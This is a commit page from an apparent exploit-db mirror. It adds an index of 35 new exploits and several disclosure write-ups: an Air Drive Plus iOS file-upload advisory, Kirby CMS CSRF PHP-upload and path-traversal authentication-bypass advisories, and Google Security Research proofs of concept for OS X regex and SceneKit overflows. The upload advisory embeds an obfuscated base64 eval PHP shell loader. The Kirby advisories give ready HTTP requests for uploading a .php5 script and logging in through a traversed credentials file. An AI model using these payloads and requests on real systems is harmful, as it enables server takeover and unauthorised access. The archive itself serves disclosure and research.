bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-23

Browse source 
35 new exploits
This commit is contained in:
Offensive Security 2015-09-23 05:02:17 +00:00
parent 06333ebc0c
commit 1d1147296b
36 changed files with 1665 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
files.csv
View file

@ -34507,6 +34507,9 @@ id,file,description,date,author,platform,type,port
38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting Vulnerability",2013-01-09,"High-Tech Bridge",php,webapps,0
38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service Vulnerability",2013-01-09,Aph3x,multiple,dos,0
38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access Vulnerability",2013-01-10,Beni_Vanda,php,webapps,0
38210,platforms/php/webapps/38210.txt,"Kirby CMS <= 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0
38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80
38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload Vulnerability",2015-09-22,Vulnerability-Lab,ios,webapps,8000
38213,platforms/php/webapps/38213.txt,"FAROL - SQL Injection Vulnerability",2015-09-16,"Thierry Fernandes Faria",php,webapps,80
38214,platforms/windows/dos/38214.txt,"Microsoft Office Excel 2007_ 2010_ 2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0
38215,platforms/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0
@ -34546,3 +34549,35 @@ id,file,description,date,author,platform,type,port
38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21
38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,metasploit,windows,remote,21
38255,platforms/php/webapps/38255.txt,"Kirby CMS <= 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80
38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash POC",2015-09-22,VIKRAMADITYA,windows,dos,0
38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal Vulnerability",2015-09-22,shinnai,windows,remote,21
38261,platforms/xml/webapps/38261.txt,"SAP Netweaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0
38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
38265,platforms/win32/dos/38265.txt,"Window Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38269,platforms/win32/dos/38269.txt,"Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38270,platforms/win32/dos/38270.txt,"Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38271,platforms/win32/dos/38271.txt,"Windows Kernel - SURFOBJ NULL Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38279,platforms/win32/dos/38279.txt,"Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38280,platforms/win32/dos/38280.txt,"Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38281,platforms/windows/dos/38281.txt,"Kaspersky Antivirus VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0
38282,platforms/windows/dos/38282.txt,"Kaspersky Antivirus ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
38283,platforms/windows/dos/38283.txt,"Kaspersky Antivirus PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0
38284,platforms/windows/dos/38284.txt,"Kaspersky Antivirus DEX File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
38285,platforms/windows/dos/38285.txt,"Kaspersky Antivirus CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0
38286,platforms/windows/dos/38286.txt,"Kaspersky Antivirus UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0
38288,platforms/windows/dos/38288.txt,"Kaspersky Antivirus _Yoda's Protector_ Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0

Can't render this file because it is too large.

190
platforms/ios/webapps/38258.txt Executable file
View file

@ -0,0 +1,190 @@
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597
Release Date:
=============
2015-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1597
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.
(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload
by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png
PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
POST-Daten:
POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://1localhost:8000/AirDriveAction_file_show/
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

92
platforms/osx/dos/38262.txt Executable file
View file

@ -0,0 +1,92 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=429
The OS X regex engine function tre_tnfa_run_parallel contains the following code:
int tbytes;
...
if (!match_tags)
num_tags = 0;
else
num_tags = tnfa->num_tags;
...
{
int rbytes, pbytes, total_bytes;
char *tmp_buf;
/* Compute the length of the block we need. */
tbytes = sizeof(*tmp_tags) * num_tags;
rbytes = sizeof(*reach_next) * (tnfa->num_states + 1);
pbytes = sizeof(*reach_pos) * tnfa->num_states;
total_bytes =
(sizeof(long) - 1) * 4 /* for alignment paddings */
+ (rbytes + tbytes * tnfa->num_states) * 2 + tbytes + pbytes;
DPRINT(("tre_tnfa_run_parallel, allocate %d bytes\n", total_bytes));
/* Allocate the memory. */
#ifdef TRE_USE_ALLOCA
buf = alloca(total_bytes);
#else /* !TRE_USE_ALLOCA */
buf = xmalloc((unsigned)total_bytes); <-- malloc is called, not alloca
#endif /* !TRE_USE_ALLOCA */
if (buf == NULL)
return REG_ESPACE;
memset(buf, 0, (size_t)total_bytes);
num_states and num_tags are computed based on the requirements of the regex and it's quite easy to make them each >64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags.
The types here are all over the place and there's conversion between int, unsigned's and size_t.
The attached PoC causes total_bytes to become negative leading to total_bytes being sign-extended in the memset call.
Severity medium because I haven't looked for exposed attack surface yet, but this doesn't require any non-standard flags (only REG_EXTENDED which is almost always used.)
Proof of Concept:
//ianbeer
#include <pthread.h>
#include <regex.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DEFAULT_REG_FLAGS (REG_EXTENDED)
void* go(void* arg){
unsigned int nesting_level = 20;
size_t inner_size = nesting_level*2+10;
char* inner = malloc(inner_size);
memset(inner, '(', nesting_level);
inner[nesting_level] = '\\';
inner[nesting_level+1] = '1';
memset(&inner[nesting_level+2], ')', nesting_level);
inner[nesting_level*2+2] = '\x00';
unsigned int n_captures = 0x1000;
char* regex = malloc(n_captures * inner_size + 100);
strcpy(regex, "f(o)o((b)a(r))");
for (unsigned int i = 0; i < n_captures; i++) {
strcat(regex, inner);
}
strcat(regex, "r\\1o|\\2f|\\3l|\\4");
const char* match_against = "hellothar!";
regex_t re;
int err = regcomp (&re, regex, DEFAULT_REG_FLAGS);
if (err == 0) {
void* something = malloc(100);
regexec (&re, match_against, 1, (regmatch_t*)something, DEFAULT_REG_FLAGS);
}
return NULL;
}
int main (int argc, char const** argv)
{
go(NULL);
return 0;
}

34
platforms/osx/dos/38263.txt Executable file
View file

@ -0,0 +1,34 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=428
OS X Libc uses the slightly obscure TRE regex engine [ http://laurikari.net/tre/ ]
If used in enhanced mode (by passing the REG_ENHANCED flag to regcomp) TRE supports arbitrary-width hex literals. Here is the code used to parse them:
/* Wide char. */
char tmp[32];
long val;
int i = 0;
ctx->re++;
while (ctx->re_end - ctx->re >= 0)
{
if (ctx->re[0] == CHAR_RBRACE)
break;
if (tre_isxdigit_l(ctx->re[0], ctx->loc))
{
tmp[i] = (char)ctx->re[0];
i++;
ctx->re++;
continue;
}
return REG_EBRACE;
}
ctx->re points to the regex characters. This code blindly copies hex characters from the regex into the 32 byte stack buffer tmp until it encounters either a non-hex character or a '}'...
I'm still not sure exactly what's compiled with REG_ENHANCED but at least grep is; try this PoC on an OS X machine:
lldb -- grep "\\\\x{`perl -e 'print "A"x1000;'`}" /bin/bash
That should crash trying to read and write pointers near 0x4141414141414141
Severity Medium because I still need to find either a priv-esc or remote context in which you can control the regex when REG_ENHANCED is enabled.

66
platforms/osx/dos/38264.txt Executable file
View file

@ -0,0 +1,66 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=467
There is a heap overflow in daeElement::setElementName(). The
vulnerable method uses a fixed size (128 bytes) heap-allocated buffer to
copy the name of an arbitrary element. By setting the name of the element
to something larger the buffer is overflown.
The vulnerable code does something like this:
if (element_name) {
if (!this->name) {
this->name = new char[128];
}
strcpy(this->name, element_name);
}
The element_name is supplied by the user and can be more than 128
characters long.
Steps to reproduce (Note: you need to enable libgmalloc):
a) $ lldb
b) (lldb) target create /usr/bin/qlmanage
Current executable set to '/usr/bin/qlmanage' (x86_64).
c) (lldb) env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
d) (lldb) process launch -- -p setElementNameOOB.dae
Process 4460 stopped
* thread #3: tid = 0x5fdc, 0x00007fff92fbf108 libsystem_c.dylib`strcpy + 104, queue = 'com.apple.root.default-qos', stop reason = EXC_BAD_ACCESS (code=1, address=0x123445409000)
frame #0: 0x00007fff92fbf108 libsystem_c.dylib`strcpy + 104
libsystem_c.dylib`strcpy:
-> 0x7fff92fbf108 <+104>: movdqu xmmword ptr [rdi + rcx + 0x10], xmm1
0x7fff92fbf10e <+110>: add rcx, 0x10
0x7fff92fbf112 <+114>: movdqa xmm1, xmmword ptr [rsi + rcx + 0x10]
0x7fff92fbf118 <+120>: pxor xmm0, xmm0
e) (lldb) bt
* thread #3: tid = 0x5fdc, 0x00007fff92fbf108 libsystem_c.dylib`strcpy + 104, queue = 'com.apple.root.default-qos', stop reason = EXC_BAD_ACCESS (code=1, address=0x123445409000)
* frame #0: 0x00007fff92fbf108 libsystem_c.dylib`strcpy + 104
frame #1: 0x0000000137c4eb4f SceneKit`daeMetaElement::create(char const*) + 199
frame #2: 0x0000000137c4bf80 SceneKit`daeIOPluginCommon::beginReadElement(daeElement*, char const*, std::__1::vector<std::__1::pair<char const*, char const*>, std::__1::allocator<std::__1::pair<char const*, char const*> > > const&, int) + 80
frame #3: 0x0000000137c5aaf3 SceneKit`daeLIBXMLPlugin::readElement(_xmlTextReader*, daeElement*, int&) + 369
frame #4: 0x0000000137c5ac51 SceneKit`daeLIBXMLPlugin::readElement(_xmlTextReader*, daeElement*, int&) + 719
frame #5: 0x0000000137c5ac51 SceneKit`daeLIBXMLPlugin::readElement(_xmlTextReader*, daeElement*, int&) + 719
frame #6: 0x0000000137c5ac51 SceneKit`daeLIBXMLPlugin::readElement(_xmlTextReader*, daeElement*, int&) + 719
frame #7: 0x0000000137c5ac51 SceneKit`daeLIBXMLPlugin::readElement(_xmlTextReader*, daeElement*, int&) + 719
frame #8: 0x0000000137c5a8cf SceneKit`daeLIBXMLPlugin::read(_xmlTextReader*) + 109
frame #9: 0x0000000137c5a914 SceneKit`daeLIBXMLPlugin::readFromMemory(char const*, daeURI const&) + 54
frame #10: 0x0000000137c4bd1d SceneKit`daeIOPluginCommon::read(daeURI const&, char const*) + 167
frame #11: 0x0000000137c3eb77 SceneKit`DAE::openCommon(daeURI const&, char const*) + 55
This bug has been tested on:
$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.10.3
BuildVersion: 14D136
$ qlmanage --version
QuickLook framework: v5.0 (675.42)
Attached are two files:
1) setElementNameOOB.dae - the POC dae file.
2) setElementNameOOB_dae.crashlog.txt - the CrashWrangler log.
Attack vector:
This bug can be triggered by any application that uses the QuickLook framework to generate a preview/thumbnail of DAE (COLLADA) files. For example, loading the supplied POC in Preview or selecting the file in Finder and hitting <space> will trigger the bug.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38264.zip

210
platforms/php/webapps/38210.txt Executable file
View file

@ -0,0 +1,210 @@
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 CSRF Content Upload and PHP Script Execution
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a filebased CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to upload normally disallowed PHP
script files.
This issue can only be exploited by authenticated users, however admin role
is not required.
Additionally, KirbyCMS has another vulnerability - Cross-Site Request Forgery
(CSRF) - which may allow attackers to perform file upload actions on behalf
of an already authenticated KirbyCMS users, if an attacker manages to trick
them into visiting a specially-crafted website.
This issue can allow an unauthorised attacker to modify or upload new content.
Both of the issues can be combined to execute arbitrary PHP code on the
remote server hosting KirbyCMS, if a logged-in victim visits a malicious page
containing an exploit crafted by an attacker.
IV. PHP Code Execution
-------------------------
KirbyCMS allows to upload content to both admin and a low privileged editor
users who can access the control panel.
The upload feature allows to upload images and other media files which can
be referenced within the content once uploaded.
KirbyCMS performs the following validation before saving an uploaded file
to prohibit risky uploads:
---[ panel/app/controllers/api/files.php ]---
protected function checkUpload($file, $blueprint) {
if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
throw new Exception('Content files cannot be uploaded');
} else if(strtolower($file->extension()) == 'php' or
in_array($file->mime(), f::$mimes['php'])) {
throw new Exception('PHP files cannot be uploaded');
} else if(strtolower($file->extension()) == 'html' or
$file->mime() == 'text/html') {
throw new Exception('HTML files cannot be uploaded');
...
}
---------------------------------------------
As we can see it prevents uploading PHP files by checking if an uploaded file
has a '.php' extension, or if the discovered MIME type of the file has been
evaluated to PHP. KirbyCMS throws an exception and stops further processing
if either of the conditions is true.
Unfortunately, both of the checks can easily be bypassed on multiple server
configurations.
As many server configurations such as Ubuntu, or Debian, process several
file extensions as PHP scripts, e.g.: .php, .php4, .php5.
The extension check can for example be evaded by simply uploading a malicious
file with the '.php4' extension.
The MIME type check can also be easily bypassed by preceding the <?php script
tags with <?xml tags , to trick the MIME detector into recognising
the malicious file as XML thus passing the check (mime['php'] != mime['xml']).
As the upload directory is not set to disable script execution by default,
bypassing the checks allows to upload arbitrary PHP scripts and execute them
on the remote server hosting a vulnerable KirbyCMS installation.
V. CSRF
-------------------------
Media files are only meant to be uploaded by authenticated users such
as editors or site administrators.
However, KirbyCMS's upload function does not protect against
cross-site request forgery by including a special CSRF token to verify
the source of the request.
As a result, an attacker can prepare a specially-crafted webpage which will
upload a malicious file to the remote KirbyCMS site without user's permission,
if the attacker manages to trick the logged-in victim into visiting his page.
VI. PROOF OF CONCEPT
-------------------------
Both of the issues described above can be combined to prepare a malicious page
which uploads an arbitrary PHP file as soon as a victim authenticated
into KirbyCMS visits the page.
An malicious CSRF html page could send a request similar to the following:
POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...
-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php
<?xml >
<?php
phpinfo();
?>
-----------------------------4679830631250006491995140822--
uploading the file as a result into the: kirby/content/1-about
directory on the server.
The malicious file can then be accessed via the URL:
http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5
Once opened, phpinfo() page should be loaded.
VII. BUSINESS IMPACT
-------------------------
By combining the two issues an attacker could execute arbitrary PHP code
on the remote server without any authentication to gain full control over
the website using a vulnerable KirbyCMS.
VIII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the PHP script execution vulnerability the webserver must be
configured to process files as PHP with extensions other than .php.
Ubuntu and Debian systems fulfill this condition. There might be more systems
which are configured in this way by default, or have been reconfigured to
do so.
To gain access to the control panel and upload a malicious PHP file, an
attacker may be able to exploit a separate, Authentication Bypass issue also
discovered by Dawid Golunski, described in a separate document.
IX. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
X. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
XI. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XII. REVISION HISTORY
-------------------------
14.09.2015 - Final
XIII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

203
platforms/php/webapps/38255.txt Executable file
View file

@ -0,0 +1,203 @@
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a filebased CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting
environment where users within the same shared environment can save/read files
in a directory accessible by both the victim and the attacker.
IV. DESCRIPTION
-------------------------
As KirbyCMS is a file based CMS, it also stores authentication data
within files in accounts directory, each user has its own password file such as:
kirby/site/accounts/[username].php
At login, KirbyCMS refer to the password file to verify the passwor hash.
During the process, it fails to validate the resulting path to ensure that
it does not contain path traversal sequences such as '../' within the login
variable provided by a user.
This makes it vulnerable to a path traversal attack and allows to bypass
the authentication if an attacker is located in the same multi-user hosting
environment and can write files to a public directory such as /tmp accessible
by the victim site with KirbyCMS.
The exact code responsible for this vulnerability is located in
kirby/core/user.php file and is shown below:
---[ kirby/core/user.php ]---
abstract class UserAbstract {
protected $username = null;
protected $cache = array();
protected $data = null;
public function __construct($username) {
$this->username = str::lower($username);
// check if the account file exists
if(!file_exists($this->file())) {
throw new Exception('The user account could not be found');
}
...
}
protected function file() {
return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
}
-----------------------------
In addition to the authentication bypass KirbyCMS was found to allow
authentication over HTTP protocol (resulting in passwords being sent
unencrypted), and to never expire authenticated sessions.
V. PROOF OF CONCEPT
-------------------------
KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files
to prevent the contents from being accessed directly via the web server.
An example file with credentials looks as follows:
---[ victimuser.php ]---
<?php if(!defined('KIRBY')) exit ?>
username: victim
email: victim@mailserver.com
password: >
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin
------------------------
To bypass the authentication an attacker who has an account in the same
hosting environment as the victim can write the above credentials file
containing an encrypted hash of the password: trythisout
into a public directory such as:
/tmp/bypassauth.php
Because of the aformentioned Path Traversal vulnerability the attacker
can use such credentials and log in as an administrator
(via: http://victim-server.com/kirby/panel/login) with:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
which will produce a HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause KirbyCMS to load credentials from the path:
